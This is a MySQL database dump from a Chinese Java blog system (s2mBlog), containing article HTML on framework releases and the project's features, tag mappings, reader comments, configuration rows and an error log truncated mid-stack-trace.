INSERT INTO `articles_content` VALUES ('20', '<p>Spring Framework 4.2.1&nbsp; ，该版本包含了<a target=\"_blank\" href=\"https://jira.spring.io/secure/ReleaseNote.jspa?projectId=10000&version=15226\">一系列关于回退和其它 issues 的修复</a>。4.2.1 同时还有一些小的改进：细化 jackson 支持 (详情看 <a href=\"https://spring.io/blog/2014/12/02/latest-jackson-integration-improvements-in-spring\">Sébastien’s updated blog post</a>)等等。详细内容请查看<a target=\"_blank\" href=\"http://spring.io/blog/2015/09/01/spring-framework-4-2-1-available-now\">发行说明</a>。</p><p><strong>Spring Framework</strong> 是一个开源的Java/Java EE全功能栈（full-stack）的应用程序框架，以Apache许可证形式发布，也有.NET平台上的<a href=\"http://www.oschina.net/p/spring.net\">移植版本</a>。\r\n该框架基于 Expert One-on-One Java EE Design and Development（ISBN \r\n0-7645-4385-7）一书中的代码，最初由 Rod Johnson 和 Juergen Hoeller等开发。Spring \r\nFramework 提供了一个简易的开发方式，这种开发方式，将避免那些可能致使底层代码变得繁杂混乱的大量的属性文件和帮助类。</p><p><img src=\"http://img.s2m.cc/s2m/2015/09/21/2740ddd3962d85a5cb9a003005b9a36b.png\" _src=\"http://img.s2m.cc/s2m/2015/09/21/2740ddd3962d85a5cb9a003005b9a36b.png\"/></p><p>fastjson 1.2.7 发布，暂未找到相关说明，下载页面请点击：<a target=\"_blank\" href=\"https://github.com/alibaba/fastjson/releases/tag/1.2.7\">1.2.7</a>。</p><p>fastjson 是一个性能很好的 Java 语言实现的 JSON 解析器和生成器，来自阿里巴巴的工程师开发。</p><p>主要特点：</p><ul class=\" list-paddingleft-2\"><li><p>快速FAST (比其它任何基于Java的解析器和生成器更快，包括<a href=\"http://www.oschina.net/p/jackson\">jackson</a>）</p></li><li><p>强大（支持普通JDK类包括任意Java Bean Class、Collection、Map、Date或enum）</p></li><li><p>零依赖（没有依赖其它任何类库除了JDK）</p></li></ul><p><img src=\"http://img.s2m.cc/s2m/2015/09/21/668c3a3bff6af390e1ab37260ee699b0.jpg\" _src=\"http://img.s2m.cc/s2m/2015/09/21/668c3a3bff6af390e1ab37260ee699b0.jpg\"/></p>');
INSERT INTO `articles_content` VALUES ('21', '<p>效果如下：</p><p><img src=\"http://img.s2m.cc/s2m/2015/09/22/bcb74c10177a789087376d51843a5aa5.png\" _src=\"http://img.s2m.cc/s2m/2015/09/22/bcb74c10177a789087376d51843a5aa5.png\"/></p><p><br/></p><p>在后台发布微博的时候，填写“封面图片地址”以实现封面图片功能支持：</p><p><img src=\"http://img.s2m.cc/s2m/2015/09/22/cc90b280314af6cb97de0d04da43f4a7.png\" _src=\"http://img.s2m.cc/s2m/2015/09/22/cc90b280314af6cb97de0d04da43f4a7.png\"/></p>');
INSERT INTO `articles_content` VALUES ('23', '<p>权限已不同的 URI&nbsp;为判断依据，系统会自动监测，无需人工繁琐录入，后期只需为检测到的 URL&nbsp;进行合理命名以及分配上下级关系即可：</p><p><img src=\"http://img.s2m.cc/s2m/2015/09/22/3f767e69531b347d7bdc1c6dec017fc9.png\" _src=\"http://img.s2m.cc/s2m/2015/09/22/3f767e69531b347d7bdc1c6dec017fc9.png\"/></p><p><br/></p><p>编辑以调整权限的上下级关系和可容易识别的名称：</p><p><img src=\"http://img.s2m.cc/s2m/2015/09/22/631533757d5d52d53bd629f5e5e84f8c.png\" _src=\"http://img.s2m.cc/s2m/2015/09/22/631533757d5d52d53bd629f5e5e84f8c.png\"/></p><p><br/></p><p>接下来，创建多角色，并为不同角色分配合理的权限：</p><p><img src=\"http://img.s2m.cc/s2m/2015/09/22/ab21e8b7331a0895a20b1aec3977dc50.png\" _src=\"http://img.s2m.cc/s2m/2015/09/22/ab21e8b7331a0895a20b1aec3977dc50.png\"/></p><p><img src=\"http://img.s2m.cc/s2m/2015/09/22/fc6c1f4cd50ba33d25b2ab726622e066.png\" _src=\"http://img.s2m.cc/s2m/2015/09/22/fc6c1f4cd50ba33d25b2ab726622e066.png\"/></p><p><br/></p><p>最后，给不同管理员分配1个或者多个组合角色：</p><p><br/></p><p><img src=\"http://img.s2m.cc/s2m/2015/09/22/4d04dfc17f95c222f0dfa5a4872ecbb6.png\" _src=\"http://img.s2m.cc/s2m/2015/09/22/4d04dfc17f95c222f0dfa5a4872ecbb6.png\"/></p><p><br/></p><p>当用户无操作权限时，访问将会被系统拒绝并给出提示：</p><p><br/></p><p><img src=\"http://img.s2m.cc/s2m/2015/09/22/503b8ce0c881156febc01770d06c7341.png\" _src=\"http://img.s2m.cc/s2m/2015/09/22/503b8ce0c881156febc01770d06c7341.png\"/></p><p><br/></p>');
INSERT INTO `articles_content` VALUES ('24', '<p>s2mBlog是基于JAVA的J2EE应用，采用 springMVC + mybatis + freemarker \r\n等框架搭建的一款高性能、MVC分离，简易的博客系统。集成了memcached 缓存架构，从安全性角度，可避免 \r\nXSS、CSRF等脚本攻击。同时，该博客系统也可作为新项目的原始框架进行二次开发。</p><p><br/></p><p>程序下载地址：<a href=\"http://img.s2m.cc/s2m/release/s2mBlog-2.0.0.zip\" title=\"本地下载\" target=\"_blank\">本地下载</a></p><p><br/></p><p>数据库脚本下载地址（后台默认用户名和密码都是&nbsp;admin）：<a title=\"数据库下载\" target=\"_blank\" href=\"http://img.s2m.cc/s2m/release/s2mBlog-2.0.0.sql\">本地下载</a></p><p><a title=\"本地下载\" target=\"_blank\" href=\"http://img.s2m.cc/s2m/release/s2mBlog-1.0.0.zip\"><br/></a></p><p>系统说明：<a title=\"关于 s2mBlog\" target=\"_blank\" href=\"http://www.s2m.cc/blog/about/\">关于 s2mBlog</a></p><p><br/></p>');
INSERT INTO `articles_content` VALUES ('25', '<p>log4j2可灵活的将日志打印在控制台、通过SMTP邮件发送、记录至文件、保存至数据库。本文介绍如何配置log4j2将日志记录至数据库</p><p><br/></p><p>建立用于保存日志的数据库表：</p><p><br/></p><p>CREATE TABLE `sys_log` (<br/>&nbsp; `id` int(11) NOT NULL AUTO_INCREMENT,<br/>&nbsp; `level` varchar(32) NOT NULL,<br/>&nbsp; `logger` varchar(100) NOT NULL,<br/>&nbsp; `message` varchar(1000) DEFAULT NULL,<br/>&nbsp; `exception` varchar(10000) DEFAULT NULL,<br/>&nbsp; `date_add` datetime NOT NULL,<br/>&nbsp; PRIMARY KEY (`id`)<br/>) ENGINE=InnoDB AUTO_INCREMENT=19 DEFAULT CHARSET=utf8mb4;<br/><br/></p><p><br/></p><p>配置 databaseAppender ：</p><p><br/></p><p>&lt;JDBC name=&quot;databaseAppender&quot; tableName=&quot;sys_log&quot;&gt;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;ConnectionFactory class=&quot;cc.s2m.web.s2mBlog.util.StaticProp&quot; method=&quot;getDatabaseConnection&quot; /&gt;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;Column name=&quot;date_add&quot; isEventTimestamp=&quot;true&quot; /&gt;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;Column name=&quot;level&quot; pattern=&quot;%level&quot; /&gt;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;Column name=&quot;logger&quot; pattern=&quot;%logger&quot; /&gt;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;Column name=&quot;message&quot; pattern=&quot;%message&quot; /&gt;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;Column name=&quot;exception&quot; pattern=&quot;%ex{full}&quot; /&gt;<br/>&nbsp;&nbsp;&nbsp; &lt;/JDBC&gt;</p><p><br/></p><p>其中 cc.s2m.web.s2mBlog.util.StaticProp&nbsp;类的getDatabaseConnection方法为获取可用的datasource：</p><p><br/></p><p>DriverManagerDataSource ds = new DriverManagerDataSource();<br/>ds.setDriverClassName(&quot;com.mysql.jdbc.Driver&quot;);</p><p>ds.setUrl(&quot;jdbc:mysql://127.0.0.1/s2mBlog?characterEncoding=utf8&quot;);</p><p>ds.setUsername(&quot;root&quot;);</p><p>ds.setPassword(&quot;123456&quot;);</p><p>return ds.getConnection();</p><p><br/></p><p>然后指派您需要记录的日志，使用 databaseAppender&nbsp;即可：</p><p><br/></p><p>&lt;logger name=&quot;SYSLOG&quot; level=&quot;INFO&quot; additivity=&quot;false&quot;&gt;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;appender-ref ref=&quot;databaseAppender&quot;/&gt; <br/>&lt;/logger&gt;</p><p><br/></p><p><br/></p><p><br/></p>');
INSERT INTO `articles_content` VALUES ('26', '<p>基于scheduling 的定时任务框架高度整合，免去了复杂的XML配置，结合数据库、后台便捷操作控制任务停启用，查看定时任务执行记录，任务是否成功执行一目了然。</p><p><br/></p><p>在 package cc.s2m.web.s2mBlog.task&nbsp;下新建自动任务类：</p><p><br/></p><p>package cc.s2m.web.s2mBlog.task;<br/><br/>import org.springframework.scheduling.annotation.Async;<br/>import org.springframework.scheduling.annotation.EnableAsync;<br/>import org.springframework.scheduling.annotation.EnableScheduling;<br/>import org.springframework.scheduling.annotation.Scheduled;<br/>import org.springframework.stereotype.Component;<br/><br/>@Component<br/>@EnableAsync<br/>@EnableScheduling<br/>public class TestTask extends BaseTask {<br/>&nbsp;&nbsp; &nbsp;@Scheduled(cron=&quot;0 0 0 */1 * *&quot;)//秒 分 时 日 月 星期几<br/>&nbsp;&nbsp; &nbsp;@Async<br/>&nbsp;&nbsp; &nbsp;public void run(){<br/>&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;super.run();<br/>&nbsp;&nbsp; &nbsp;}<br/>&nbsp;&nbsp; &nbsp;<br/>&nbsp;&nbsp; &nbsp;/**<br/>&nbsp;&nbsp; &nbsp; * 任务具体实现方法<br/>&nbsp;&nbsp; &nbsp; */<br/>&nbsp;&nbsp; &nbsp;public void doTask(){<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;<br/>&nbsp;&nbsp;&nbsp; }<br/><br/>}</p><p><br/></p><p>在 doTask&nbsp;方法中编写具体的任务实现代码即可。</p><p><br/></p><p>然后在系统后台查看所有的自动化定时任务，选择合适的任务启动：</p><p><br/></p><p><img src=\"http://img.s2m.cc/s2m/2015/09/22/bc10535cf4d40ee69cc729b3632926cf.png\" _src=\"http://img.s2m.cc/s2m/2015/09/22/bc10535cf4d40ee69cc729b3632926cf.png\"/></p><p><br/></p><p>在“任务执行记录“中查看自动定时任务执行情况：</p><p><br/></p><p><img src=\"http://img.s2m.cc/s2m/2015/09/22/4ef00f0796ac44e4c031b898dce56593.png\" _src=\"http://img.s2m.cc/s2m/2015/09/22/4ef00f0796ac44e4c031b898dce56593.png\"/></p>');
INSERT INTO `articles_content` VALUES ('62', '<p>时隔5天，我们有见面了。</p><p>本次 S2M 给大家带来了微信公众号整个功能（演示地址：<a target=\"_blank\" href=\"http://www.s2m.cc/blog/wx66/\">http://www.s2m.cc/blog/wx66/</a>），先看截图：</p><p><img src=\"http://img.s2m.cc/s2m/2015/09/28/61c7c9fa8e1bd85aa3b239b8f9b6eace.png\" _src=\"http://img.s2m.cc/s2m/2015/09/28/61c7c9fa8e1bd85aa3b239b8f9b6eace.png\" style=\"\"/></p><p><img src=\"http://img.s2m.cc/s2m/2015/09/28/c445b11dc7d6b8dcb0880481111e4315.png\" _src=\"http://img.s2m.cc/s2m/2015/09/28/c445b11dc7d6b8dcb0880481111e4315.png\" style=\"\"/></p><p><img src=\"http://img.s2m.cc/s2m/2015/09/28/53d00b50e006bb2eca60b6649e5d3f5e.png\" _src=\"http://img.s2m.cc/s2m/2015/09/28/53d00b50e006bb2eca60b6649e5d3f5e.png\" style=\"\"/></p><p><img src=\"http://img.s2m.cc/s2m/2015/09/28/0a29118e7187f6f33fc65f2c06cb76ab.png\" _src=\"http://img.s2m.cc/s2m/2015/09/28/0a29118e7187f6f33fc65f2c06cb76ab.png\" style=\"\"/></p><p><img src=\"http://img.s2m.cc/s2m/2015/09/28/900de7e85040fc2386a219bdd51a6976.png\" _src=\"http://img.s2m.cc/s2m/2015/09/28/900de7e85040fc2386a219bdd51a6976.png\" style=\"\"/></p><p><br/></p><p>简单介绍一下功能：</p><p><br/></p><p>1、在微信公众号开发者界面，设置好对接的信息，s2mBlog 将自动完成公众平台的对接：</p><p><br/></p><p><img src=\"http://img.s2m.cc/s2m/2015/09/28/197ae6c2fd539ac2264088e3a29cf9d9.png\" _src=\"http://img.s2m.cc/s2m/2015/09/28/197ae6c2fd539ac2264088e3a29cf9d9.png\"/></p><p><br/></p><p>在微信平台设置好上面的信息后，要配套的将这些信息对应到我们的系统里，主要是修改 “spring-core.xml” 文件，如图：</p><p><br/></p><p><img src=\"http://img.s2m.cc/s2m/2015/09/28/200d9a2117281fd94a8c488261a08e9c.png\" _src=\"http://img.s2m.cc/s2m/2015/09/28/200d9a2117281fd94a8c488261a08e9c.png\"/></p><p><br/></p><p>2、这时候，有用户关注公众号，系统会进行自动回复，回复的内容，在系统设置里面进行设置：</p><p><img src=\"http://img.s2m.cc/s2m/2015/09/28/8989a3f681ad8f4a6d9c240e2b156797.png\" _src=\"http://img.s2m.cc/s2m/2015/09/28/8989a3f681ad8f4a6d9c240e2b156797.png\"/></p><p>3、在任何时候，回复 “？” ，即可拉去上面的欢迎菜单，方便用户操作</p><p>4、回复 top4 （其中数字4为 1 到 10 ，代表一次获取几篇博文），可以获取最新的4篇博文；</p><p>5、输入任意文字，系统将作为关键词进行搜索您的博文，最多返回10篇相关的博文，您可以慢慢品读回味以及转发至朋友圈；</p><p>6、通过微信直接发送博文的功能，需要公众号通过微信平台认证，否则会没有权限的哦（使用了一些高级API，需要认证授权）。</p><p><br/></p><p>那么，系统是如何识别谁是管理员？当然，不是谁都可以在公众号发表博文，如图：</p><p><br/></p><p><img src=\"http://img.s2m.cc/s2m/2015/09/28/c063b46a6a3176d957a84bf08e2b7019.png\" _src=\"http://img.s2m.cc/s2m/2015/09/28/c063b46a6a3176d957a84bf08e2b7019.png\"/></p><p><br/></p><p>那么，如何获得授权呢?</p><p><br/></p><p>打开后台 “微信管理员” 功能页面：</p><p><br/></p><p><img src=\"http://img.s2m.cc/s2m/2015/09/28/84339d644b132cac2bf81d90416de192.png\" _src=\"http://img.s2m.cc/s2m/2015/09/28/84339d644b132cac2bf81d90416de192.png\"/></p><p><br/></p><p>这里展示的用户，才可以直接在公众号上发表博文，点击 “添加” 按钮，为用户直接授权：</p><p><br/></p><p><img src=\"http://img.s2m.cc/s2m/2015/09/28/8a50bf60c2ad858c303a79f45f07dc92.png\" _src=\"http://img.s2m.cc/s2m/2015/09/28/8a50bf60c2ad858c303a79f45f07dc92.png\"/></p><p><br/></p><p>该授权码有效期为 10 秒，所以，点击 “增加” 按钮后，请尽快，在10秒内完成确认授权。</p><p><br/></p><p>该功能还需要开启两个自动定时任务：</p><p><br/></p><p><img src=\"http://img.s2m.cc/s2m/2015/09/28/ee006ede21c58f48bba40104360a0dcd.png\" _src=\"http://img.s2m.cc/s2m/2015/09/28/ee006ede21c58f48bba40104360a0dcd.png\"/></p><p><br/></p><p>上面的任务是每隔一段时间刷新微信服务器的 Token ，确保可以正常调动 API 接口；</p><p>下面的任务是作为异步进行博文发送使用，确保用户在微信端使用的流畅度和用户体验；</p><p><br/></p>');
INSERT INTO `articles_content` VALUES ('66', '<p><img src=\"http://img.s2m.cc/s2m/2015/09/29/fb6b5f8ef9aaf80d670e509356fe802a.jpg\"></p><p><img src=\"http://img.s2m.cc/s2m/2015/09/29/7a8204b921a4a032da383e7ef9bd00ce.jpg\"></p><p><img src=\"http://img.s2m.cc/s2m/2015/09/29/870ef07dd3430e3695048953f66c34b5.jpg\"></p><link href=\"/assets/video-js/video-js.css\" rel=\"stylesheet\" type=\"text/css\"><script src=\"/assets/video-js/video.js\"></script><script>videojs.options.flash.swf = \"/assets/video-js/video-js.swf\";</script><video class=\"video-js vjs-default-skin\" controls preload=\"none\" data-setup=\"{}\"><source src=\"http://img.s2m.cc/s2m/2015/09/29/416f90fa786e7689e277b2501432f6bc.mp4\" type=\'video/mp4\' /><track kind=\"captions\" src=\"/assets/video-js/demo.captions.vtt\" srclang=\"en\" label=\"English\"></track><track kind=\"subtitles\" src=\"/assets/video-js/demo.captions.vtt\" srclang=\"en\" label=\"English\"></track><p class=\"vjs-no-js\">To view this video please enable JavaScript, and consider upgrading to a web browser that </p></video>');
INSERT INTO `articles_content` VALUES ('67', '<p>s2m为什么要选择云存储作为图片、视频、附件的保存？云存储除了可以分担网站的流量访问，提升网站的快速响应，后期还可以无缝结合CDN实现高速缓存，还能保证了附件和程序分离，达到最大的安全性，同时，在后期分布式集群部署的时候，也无需考虑附件这块的各种问题</p><p><br/></p><p>1、有时候图片、视频容量比较大，如果都和网站放在同一个服务器上，难免会影响带宽的利用率，现在很多云存储是免费的，而且提供了相当高的带宽和内置 CND 高速缓存的支持，可以说，使用云存储是相当完美的一种解决方案；</p><p><br/></p><p>2、我们无法保证上传的图片、视频的安全性，如果直接将上传的文件保存在程序运行的服务器上，难免会存在安全隐患，那么，把这些附件保存在第三方的云存储上面，即可高枕无忧；</p><p><br/></p><p>3、随着网站访问量的快速增长，技术上会采用多服务器分布式集群部署来达到高并发、高吞吐性能，那么，使用了云存储以后，使得分布式变得非常简单和轻松得以实现；</p><p><br/></p><p>4、高度稳定、可靠性得以保证，现在的云存储提供商，都在硬件冗余、故障切换、升级不间断访问、无限制容量扩展、海量存储等性能上做到了极致，最关键的是性价比超级高，直接将上传的附件保存在自己服务器、云主机、甚至是虚拟主机上在当下的确不再是一种明智的选择；</p><p><br/></p><p>基于云存储太多的优势，s2mBlog 采用了云存储的方案来进行上传的图片、视频、附件的存储解决方案。<br/></p>');
INSERT INTO `articles_content` VALUES ('68', '<p>新增上一篇、下一篇、相关博文功能，方便用户快速导航浏览博文，通过标签匹配相关博文，提升用户体验</p><p><br/></p><p><img src=\"http://img.s2m.cc/s2m/2015/09/29/4f5c45906257f686ecbc33d9d1bac334.png\" _src=\"http://img.s2m.cc/s2m/2015/09/29/4f5c45906257f686ecbc33d9d1bac334.png\"/></p>');

-- ----------------------------
-- Table structure for articles_tags
-- ----------------------------
DROP TABLE IF EXISTS `articles_tags`;
CREATE TABLE `articles_tags` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `aid` int(11) NOT NULL,
  `tid` int(11) NOT NULL,
  PRIMARY KEY (`id`),
  KEY `IDX_AID` (`aid`) USING BTREE,
  KEY `IDX_TID` (`tid`) USING BTREE
) ENGINE=InnoDB AUTO_INCREMENT=183 DEFAULT CHARSET=utf8mb4;

-- ----------------------------
-- Records of articles_tags
-- ----------------------------
INSERT INTO `articles_tags` VALUES ('84', '13', '10');
INSERT INTO `articles_tags` VALUES ('85', '13', '9');
INSERT INTO `articles_tags` VALUES ('86', '13', '7');
INSERT INTO `articles_tags` VALUES ('90', '14', '11');
INSERT INTO `articles_tags` VALUES ('91', '14', '7');
INSERT INTO `articles_tags` VALUES ('92', '14', '5');
INSERT INTO `articles_tags` VALUES ('93', '15', '7');
INSERT INTO `articles_tags` VALUES ('98', '18', '13');
INSERT INTO `articles_tags` VALUES ('99', '19', '13');
INSERT INTO `articles_tags` VALUES ('100', '17', '14');
INSERT INTO `articles_tags` VALUES ('101', '17', '12');
INSERT INTO `articles_tags` VALUES ('102', '16', '14');
INSERT INTO `articles_tags` VALUES ('103', '16', '8');
INSERT INTO `articles_tags` VALUES ('104', '20', '14');
INSERT INTO `articles_tags` VALUES ('107', '21', '14');
INSERT INTO `articles_tags` VALUES ('108', '21', '12');
INSERT INTO `articles_tags` VALUES ('112', '23', '14');
INSERT INTO `articles_tags` VALUES ('113', '23', '12');
INSERT INTO `articles_tags` VALUES ('120', '24', '14');
INSERT INTO `articles_tags` VALUES ('121', '24', '8');
INSERT INTO `articles_tags` VALUES ('123', '25', '12');
INSERT INTO `articles_tags` VALUES ('124', '25', '7');
INSERT INTO `articles_tags` VALUES ('127', '26', '12');
INSERT INTO `articles_tags` VALUES ('128', '26', '7');
INSERT INTO `articles_tags` VALUES ('166', '66', '15');
INSERT INTO `articles_tags` VALUES ('173', '67', '13');
INSERT INTO `articles_tags` VALUES ('174', '67', '12');
INSERT INTO `articles_tags` VALUES ('175', '67', '7');
INSERT INTO `articles_tags` VALUES ('176', '12', '8');
INSERT INTO `articles_tags` VALUES ('177', '12', '7');
INSERT INTO `articles_tags` VALUES ('178', '62', '15');
INSERT INTO `articles_tags` VALUES ('179', '62', '14');
INSERT INTO `articles_tags` VALUES ('180', '62', '12');
INSERT INTO `articles_tags` VALUES ('181', '68', '14');
INSERT INTO `articles_tags` VALUES ('182', '68', '12');

-- ----------------------------
-- Table structure for comment
-- ----------------------------
DROP TABLE IF EXISTS `comment`;
CREATE TABLE `comment` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `aid` int(11) NOT NULL,
  `name` varchar(255) NOT NULL,
  `linkMsg` varchar(255) DEFAULT NULL,
  `msg` varchar(1000) NOT NULL,
  `reply` varchar(1000) DEFAULT NULL,
  `ip` varchar(255) NOT NULL,
  `date_add` datetime NOT NULL,
  PRIMARY KEY (`id`),
  KEY `IDX_AID` (`aid`) USING BTREE
) ENGINE=InnoDB AUTO_INCREMENT=17 DEFAULT CHARSET=utf8mb4;

-- ----------------------------
-- Records of comment
-- ----------------------------
INSERT INTO `comment` VALUES ('6', '16', '德龙', '', '功能还比较简单，再接再厉，不过很轻，清爽。框架很不错，准备用在这个框架来搭建我们的B2C的项目，以后有不懂的还要向大神请教~', '大家一起交流，谢谢支持！', '101.68.143.112', '2015-09-21 16:57:17');
INSERT INTO `comment` VALUES ('7', '17', '小鱼儿', '', '这个功能还是需要的', null, '101.68.143.112', '2015-09-21 17:15:28');
INSERT INTO `comment` VALUES ('8', '26', '游客', '牛', '赞！这个太方便了，稍微扩展一下就可以实现分布式定时任务了，支持！希望你们越做越好！！！', null, '101.68.143.112', '2015-09-23 11:14:50');
INSERT INTO `comment` VALUES ('9', '23', '牛', '', '界面稍显单薄，不过功能上感觉已经非常完美了，本身也是要二次开发的，发觉用这个框架进行 JAVA 项目的开发，太省力了，很多功能全部都已经帮我考虑好了，非常感谢。', null, '101.68.143.112', '2015-09-23 11:16:42');
INSERT INTO `comment` VALUES ('10', '12', '游客', '', '已经下载使用，谢谢分享，换个UI，就可以用来做团购了，期待整套支付接口尽快开放。', null, '101.68.143.112', '2015-09-24 13:59:28');
INSERT INTO `comment` VALUES ('11', '16', 'SmileLion', '1016252216@qq.com', '关注中，加油！', '谢谢关注，我们将持续努力', '36.45.131.243', '2015-09-25 15:14:25');
INSERT INTO `comment` VALUES ('12', '21', '游客', '', '不错，这样看起来丰富多了，否则全是文字比较单调哦~', null, '101.68.143.171', '2015-09-28 18:28:42');
INSERT INTO `comment` VALUES ('13', '62', '叫我小牛顿', '', '不错，关注了很久了，能看到你们在不断进步，这个功能不错，赞一个', null, '101.68.143.171', '2015-09-29 09:06:17');
INSERT INTO `comment` VALUES ('14', '66', '游客', '', '很不错，到处旅游，都可以随时随地发博文啦~赞', null, '101.68.143.171', '2015-09-29 09:22:13');
INSERT INTO `comment` VALUES ('15', '66', '游客', '', '用来做旅游公司、旅行社的网站不错，扁平化，加上优美的照片、美如画的风景，棒棒哒', null, '101.68.143.171', '2015-09-29 10:11:56');

-- ----------------------------
-- Table structure for idcreater
-- ----------------------------
DROP TABLE IF EXISTS `idcreater`;
CREATE TABLE `idcreater` (
  `id` int(20) NOT NULL AUTO_INCREMENT,
  `name` char(2) NOT NULL,
  `value` bigint(20) NOT NULL,
  `createdAt` datetime NOT NULL,
  `updatedAt` datetime NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

-- ----------------------------
-- Records of idcreater
-- ----------------------------

-- ----------------------------
-- Table structure for roles
-- ----------------------------
DROP TABLE IF EXISTS `roles`;
CREATE TABLE `roles` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `name` varchar(255) NOT NULL,
  `profile` varchar(255) NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=3 DEFAULT CHARSET=utf8mb4;

-- ----------------------------
-- Records of roles
-- ----------------------------
INSERT INTO `roles` VALUES ('1', '游客', '开放给游客使用，只读，不能修改数据');

-- ----------------------------
-- Table structure for sys_config
-- ----------------------------
DROP TABLE IF EXISTS `sys_config`;
CREATE TABLE `sys_config` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `type` int(11) NOT NULL DEFAULT '0' COMMENT '参数类型,预留',
  `key` varchar(255) NOT NULL COMMENT '参数编号',
  `value` varchar(255) NOT NULL COMMENT '参数值',
  `remark` varchar(255) DEFAULT NULL COMMENT '备注',
  `creat_at` datetime NOT NULL,
  `update_at` datetime NOT NULL,
  PRIMARY KEY (`id`),
  UNIQUE KEY `IX_UNIQ_KEY` (`key`) USING HASH
) ENGINE=InnoDB AUTO_INCREMENT=8 DEFAULT CHARSET=utf8 COMMENT='系统参数配置';

-- ----------------------------
-- Records of sys_config
-- ----------------------------
INSERT INTO `sys_config` VALUES ('1', '0', 'VERSION', '2.0.0', '系统版本号', '2015-09-24 15:02:56', '2015-09-24 15:25:45');
INSERT INTO `sys_config` VALUES ('6', '0', 'WEIXIN_WELCOME', '感谢您关注S2M官方公众号，有您的支持，相信我们会越做越好\r\n\r\n① 回复top4，获取最新的4条博文，数字范围 1-10\r\n\r\n② 回复任意文字，搜索相关博文\r\n\r\n③ 直接上传多张照片，发布图文博文（需要管理权限）\r\n\r\n④ 直接上传视频，发布视频（小视频）类博文（需要管理权限）\r\n\r\n\r\n回复 ? 显示此帮助菜单', '微信关注欢迎词', '2015-09-28 09:14:52', '2015-09-28 16:03:10');
INSERT INTO `sys_config` VALUES ('7', '0', 'WEIXIN_TAG', '15', '微信发布博文使用的标签编号', '2015-09-28 15:59:32', '2015-09-28 16:00:26');

-- ----------------------------
-- Table structure for sys_log
-- ----------------------------
DROP TABLE IF EXISTS `sys_log`;
CREATE TABLE `sys_log` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `level` varchar(32) NOT NULL,
  `logger` varchar(100) NOT NULL,
  `message` varchar(1000) DEFAULT NULL,
  `exception` varchar(10000) DEFAULT NULL,
  `date_add` datetime NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=138 DEFAULT CHARSET=utf8mb4;

-- ----------------------------
-- Records of sys_log
-- ----------------------------
INSERT INTO `sys_log` VALUES ('135', 'ERROR', 'SYSLOG', '无法定时刷新获取微信token数据', '', '2015-09-28 18:32:00');
INSERT INTO `sys_log` VALUES ('136', 'ERROR', 'SYSLOG', '无法定时刷新获取微信token数据', '', '2015-09-28 18:33:00');
INSERT INTO `sys_log` VALUES ('137', 'ERROR', 'org.springframework.web.servlet.DispatcherServlet', 'Context initialization failed', 'org.springframework.beans.factory.BeanCreationException: Error creating bean with name \'initWebApplication\': Invocation of init method failed; nested exception is java.lang.NullPointerException\r\n	at org.springframework.beans.factory.annotation.InitDestroyAnnotationBeanPostProcessor.postProcessBeforeInitialization(InitDestroyAnnotationBeanPostProcessor.java:136)\r\n	at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.applyBeanPostProcessorsBeforeInitialization(AbstractAutowireCapableBeanFactory.java:408)\r\n	at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.initializeBean(AbstractAutowireCapableBeanFactory.java:1570)\r\n	at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.doCreateBean(AbstractAutowireCapableBeanFactory.java:545)\r\n	at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.createBean(AbstractAutowireCapableBeanFactory.java:482)\r\n	at org.springframework.beans.factory.support.AbstractBeanFactory$1.getObject(AbstractBeanFactory.java:305)\r\n	at org.springframework.beans.factory.support.DefaultSingletonBeanRegistry.getSingleton(DefaultSingletonBeanRegistry.java:230)\r\n	at org.springframework.beans.factory.support.AbstractBeanFactory.doGetBean(AbstractBeanFactory.java:301)\r\n	at org.springframework.beans.factory.support.AbstractBeanFactory.getBean(AbstractBeanFactory.java:196)\r\n	at org.springframework.beans.factory.support.DefaultListableBeanFactory.preInstantiateSingletons(DefaultListableBeanFactory.java:772)\r\n	at org.springframework.context.support.AbstractApplicationContext.finishBeanFactoryInitialization(AbstractApplicationContext.java:834)\r\n	at org.springframework.context.support.AbstractApplicationContext.refresh(AbstractApplicationContext.java:537)\r\n	at org.springframework.web.servlet.FrameworkServlet.configureAndRefreshWebApplicationContext(FrameworkServlet.java:667)\r\n	at org.springframework.web.servlet.FrameworkServlet.createWebApplicationContext(FrameworkServlet.java:633)\r\n	at org.springframework.web.servlet.FrameworkServlet.createWebApplicationContext(FrameworkServlet.java:681)\r\n	at org.springframework.web.servlet.FrameworkServlet.initWebApplicationContext(FrameworkServlet.java:552)\r\n	at org.springframework.web.servlet.FrameworkServlet.initServletBean(FrameworkServlet.java:493)\r\n	at org.springframework.web.servlet.HttpServletBean.init(HttpServletBean.java:136)\r\n	at javax.servlet.GenericServlet.init(GenericServlet.java:160)\r\n	at org.apache.catalina.core.StandardWrapper.initServlet(StandardWrapper.java:1280)\r\n	at org.apache.catalina.core.StandardWrapper.loadServlet(StandardWrapper.java:1193)\r\n	at org.apache.catalina.core.StandardWrapper.load(StandardWrapper.java:1088)\r\n	at org.apache.catalina.core.StandardContext.loadOnStartup(StandardContext.java:5176)\r\n	at org.apache.catalina.core.StandardContext.startInternal(StandardContext.java:5460)\r\n	at org.apache.catalina.util.LifecycleBase.start(LifecycleBase.java:150)\r\n	at org.apache.catalina.core.ContainerBase$StartChild.call(ContainerBase.java:1559)\r\n	at 